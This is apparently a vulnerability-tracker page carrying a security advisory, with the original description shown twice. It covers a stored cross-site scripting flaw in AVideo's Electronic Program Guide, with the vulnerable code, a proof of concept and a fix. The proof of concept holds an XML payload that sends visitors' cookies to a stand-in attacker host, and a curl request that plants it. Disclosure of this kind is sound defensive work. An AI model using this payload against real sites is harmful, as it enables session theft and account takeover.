Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.4
AVideo's EPG Feature Fails to Prevent JavaScript Injection
CVE-2026-39367
GHSA-rqp3-gf5h-mrqx
Summary
AVideo's Electronic Program Guide feature in versions 26.0 and earlier allows attackers to inject malicious JavaScript code into the guide, which can steal user sessions and take control of accounts when visitors view the public EPG page. This means that anyone can steal or take over user accounts by tricking visitors into viewing the maliciously crafted guide. To fix this, update to the latest version of AVideo.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| wwbn | avideo | <= 26.0 | – |
Original title
WWBN AVideo has Stored XSS via Malicious EPG XML Program Titles in AVideo EPG Page
Original description
## Summary
AVideo's EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video's `epg_link` to a malicious XML file whose `<title>` elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.
## Details
The vulnerability spans three files in the data flow:
**1. Entry point — `objects/videoAddNew.json.php:117-119`**
The `epg_link` parameter is stored with only a URL format check:
```php
if (empty($_POST['epg_link']) || isValidURL($_POST['epg_link'])) {
$obj->setEpg_link($_POST['epg_link']);
}
```
This requires `User::canUpload()` (line 10) — not admin, just basic upload permission.
**2. XML parsing — `objects/EpgParser.php:321`**
Programme titles are extracted as raw strings with no sanitization:
```php
$this->epgdata[$grouper ?: 0] = [
'title' => (string) $element->title,
// ...
];
```
**3. Sink — `plugin/PlayerSkins/epg.php:343-351`**
Programme titles are interpolated directly into HTML output without `htmlspecialchars()` or any escaping:
```php
} else if ($width <= $minimumWidth1Dot) {
$text = "<abbr title=\"{$program['title']}\">.</abbr>"; // attribute injection
} else if ($width <= $minimumWidth) {
$text = "<abbr title=\"{$program['title']}\"><small ..."; // attribute injection
} else if ($width <= $minimumSmallFont) {
$text = "<small class=\"small-font\">{$program['title']}<div>..."; // HTML injection
} else {
$text = "{$program['title']}<div>..."; // HTML injection
}
```
Notably, the channel `display-name` **is** sanitized via `safeString()` at line 151, but programme titles are not — an apparent oversight.
The EPG page (`epg.php`) requires no authentication to access, and the rendered output is cached at line 634 (`ObjectYPT::setCache`), so the XSS payload persists in cache even if the original malicious XML is later removed.
## PoC
**Step 1:** Host a malicious XMLTV file at an attacker-controlled URL:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<tv>
<channel id="ch1">
<display-name>Test Channel</display-name>
</channel>
<programme start="20260404060000 +0000" stop="20260404070000 +0000" channel="ch1">
<title><![CDATA[<img src=x onerror=fetch('https://attacker.example/steal?c='+document.cookie)>]]></title>
</programme>
</tv>
```
**Step 2:** Create a video with the malicious EPG link (requires upload permission):
```bash
curl -s -b 'PHPSESSID=UPLOAD_USER_SESSION' \
'https://target.example/objects/videoAddNew.json.php' \
-d 'title=LiveStream&videoLink=https://example.com/stream.m3u8&epg_link=https://attacker.example/evil.xml&categories_id=1'
```
**Step 3:** Any visitor (unauthenticated) browsing the EPG page triggers the XSS:
```
https://target.example/plugin/PlayerSkins/epg.php
```
The `<img onerror>` payload executes in the browser of every visitor, exfiltrating cookies and session tokens.
## Impact
- **Session hijacking**: Any visitor's session cookies are exfiltrated, including administrators
- **Account takeover**: Stolen admin sessions allow full platform control
- **Persistent**: The XSS payload is cached server-side and fires for every page visitor without further interaction
- **Wide blast radius**: The EPG page is publicly accessible with no authentication required
## Recommended Fix
Escape all programme data before rendering in HTML. In `plugin/PlayerSkins/epg.php`, apply `htmlspecialchars()` to programme titles before interpolation:
```php
// Around line 340, before the width checks:
$safeTitle = htmlspecialchars($program['title'], ENT_QUOTES, 'UTF-8');
// Then use $safeTitle instead of $program['title']:
} else if ($width <= $minimumWidth1Dot) {
$text = "<abbr title=\"{$safeTitle}\">.</abbr>";
} else if ($width <= $minimumWidth) {
$text = "<abbr title=\"{$safeTitle}\"><small class=\"duration\">{$minutes} Min</small></abbr>";
} else if ($width <= $minimumSmallFont) {
$text = "<small class=\"small-font\">{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div></small>";
} else {
$text = "{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div>";
}
```
Additionally, consider sanitizing all EPG XML fields at parse time in `EpgParser.php:316-330` to defend in depth.
AVideo's EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video's `epg_link` to a malicious XML file whose `<title>` elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.
## Details
The vulnerability spans three files in the data flow:
**1. Entry point — `objects/videoAddNew.json.php:117-119`**
The `epg_link` parameter is stored with only a URL format check:
```php
if (empty($_POST['epg_link']) || isValidURL($_POST['epg_link'])) {
$obj->setEpg_link($_POST['epg_link']);
}
```
This requires `User::canUpload()` (line 10) — not admin, just basic upload permission.
**2. XML parsing — `objects/EpgParser.php:321`**
Programme titles are extracted as raw strings with no sanitization:
```php
$this->epgdata[$grouper ?: 0] = [
'title' => (string) $element->title,
// ...
];
```
**3. Sink — `plugin/PlayerSkins/epg.php:343-351`**
Programme titles are interpolated directly into HTML output without `htmlspecialchars()` or any escaping:
```php
} else if ($width <= $minimumWidth1Dot) {
$text = "<abbr title=\"{$program['title']}\">.</abbr>"; // attribute injection
} else if ($width <= $minimumWidth) {
$text = "<abbr title=\"{$program['title']}\"><small ..."; // attribute injection
} else if ($width <= $minimumSmallFont) {
$text = "<small class=\"small-font\">{$program['title']}<div>..."; // HTML injection
} else {
$text = "{$program['title']}<div>..."; // HTML injection
}
```
Notably, the channel `display-name` **is** sanitized via `safeString()` at line 151, but programme titles are not — an apparent oversight.
The EPG page (`epg.php`) requires no authentication to access, and the rendered output is cached at line 634 (`ObjectYPT::setCache`), so the XSS payload persists in cache even if the original malicious XML is later removed.
## PoC
**Step 1:** Host a malicious XMLTV file at an attacker-controlled URL:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<tv>
<channel id="ch1">
<display-name>Test Channel</display-name>
</channel>
<programme start="20260404060000 +0000" stop="20260404070000 +0000" channel="ch1">
<title><![CDATA[<img src=x onerror=fetch('https://attacker.example/steal?c='+document.cookie)>]]></title>
</programme>
</tv>
```
**Step 2:** Create a video with the malicious EPG link (requires upload permission):
```bash
curl -s -b 'PHPSESSID=UPLOAD_USER_SESSION' \
'https://target.example/objects/videoAddNew.json.php' \
-d 'title=LiveStream&videoLink=https://example.com/stream.m3u8&epg_link=https://attacker.example/evil.xml&categories_id=1'
```
**Step 3:** Any visitor (unauthenticated) browsing the EPG page triggers the XSS:
```
https://target.example/plugin/PlayerSkins/epg.php
```
The `<img onerror>` payload executes in the browser of every visitor, exfiltrating cookies and session tokens.
## Impact
- **Session hijacking**: Any visitor's session cookies are exfiltrated, including administrators
- **Account takeover**: Stolen admin sessions allow full platform control
- **Persistent**: The XSS payload is cached server-side and fires for every page visitor without further interaction
- **Wide blast radius**: The EPG page is publicly accessible with no authentication required
## Recommended Fix
Escape all programme data before rendering in HTML. In `plugin/PlayerSkins/epg.php`, apply `htmlspecialchars()` to programme titles before interpolation:
```php
// Around line 340, before the width checks:
$safeTitle = htmlspecialchars($program['title'], ENT_QUOTES, 'UTF-8');
// Then use $safeTitle instead of $program['title']:
} else if ($width <= $minimumWidth1Dot) {
$text = "<abbr title=\"{$safeTitle}\">.</abbr>";
} else if ($width <= $minimumWidth) {
$text = "<abbr title=\"{$safeTitle}\"><small class=\"duration\">{$minutes} Min</small></abbr>";
} else if ($width <= $minimumSmallFont) {
$text = "<small class=\"small-font\">{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div></small>";
} else {
$text = "{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div>";
}
```
Additionally, consider sanitizing all EPG XML fields at parse time in `EpgParser.php:316-330` to defend in depth.
nvd CVSS3.1
5.4
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
Published: 8 Apr 2026 · Updated: 8 Apr 2026 · First seen: 7 Apr 2026